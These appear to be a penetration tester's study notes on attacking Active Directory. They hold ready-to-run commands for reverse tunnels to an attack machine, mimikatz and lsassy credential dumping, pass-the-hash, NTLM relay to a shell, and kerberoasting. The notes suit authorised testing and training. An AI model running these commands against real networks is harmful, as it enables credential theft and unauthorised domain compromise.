Active Directory notes

This is a brief overview of my AD Mindmap. It's kinda rambly and is mostly just a dump of my notes, so I apologize if it's a bit hard to follow.

Basic thought: "if you can't go up, go out" -- If no local privesc, then you try to find more accounts to get ahold of and reassess once new assets have been pwn'd. If local privesc doesn't yield DC Admin, try to use it to find other local creds or domain creds, rinse and repeat.

Basically: gain an account. Can local privesc? If no, gain more accounts through other means. Can more accounts local privesc or do DCSync? Does local LSASS have domain creds in it? If no, find even more accounts....and so on.

First things

  • Get Initial Access
  • Establish tunnel into network
    • SSH good?
      • ssh -N -R 9999 kali@192.168.1.1
    • If no, use chisel!
      • Grab platform specific client release here
      • Infil onto the remote host.
      • Run the server on attack: chisel server --port 8080 --reverse
      • On victim: chisel client <server IP>:8080 R:socks
      • This will setup a SOCKS5 proxy on 1080 on the attack machine

Going up...

  • Can get Local Privesc?
    • Reference the Windows Privesc Article
    • if yes, mimikatz time - dump creds
      • mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
      • You can also do this with CME: crackmapexec smb 172.16.187.0/24 -u <local admin user> -H '<hash>' -M lsassy
        • Above would try to dump creds from all machines in that network.
      • Do I have DC Admin hashes?
        • Can I crack them?
          • use hashcat -m XXXX <hash file> <wordlist>
            • Do hashcat -h | grep -i <hash format> to find out what to populate XXXX with.
        • Can I pass them?
          • SMB Client:
            • smbclient -L -U <user> --pw-nt-hash <hash>
            • smbclient \\\\<IP/HOST>\\<SHARE> -U <username>%<hash> --pw-nt-hash
          • Crackmapexec and evil-winrm use the -H flag to accomplish this.
        • Can I pass the ticket?
      • If no DC Admin Hashes, do I have domain account hashes I can use to get onto another computer?

Going out (lateral movement)

  • No local privesc? Can lateral move?
    • Internally vulnerable services?
      • I.e. do proxychains -q nmap -sT -vvv -Pn <internal IPs> through your tunnel and assess the internal network like normal.
      • Internal svcs may use svc accts to access resources. If you can get a service to make SMB requests to arbitrary hosts, try this stuff:
        • Can use responder to catch creds being passed around?
          • sudo responder -I <network iface>
        • can use ntlmrelayx to get RCE like this?
          • impacket-ntlmrelayx --no-http-server -smb2support -t <target IP> -c "<command>"
          • N.B. you can put a shell where it says "<command>"
    • Have any discovered creds? Can password spray? Use CME
    • Can kerberoast?
      • cme ldap 192.168.0.104 -u <user> -p <pass> --kerberoasting output.txt
      • impacket-GetNPUsers <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
    • Can AS-REP roast?
      • cme ldap 192.168.0.104 -u <user> -p <pass> --asreproast output.txt
    • Ingest bloodhound:
      • can find path to DCSync?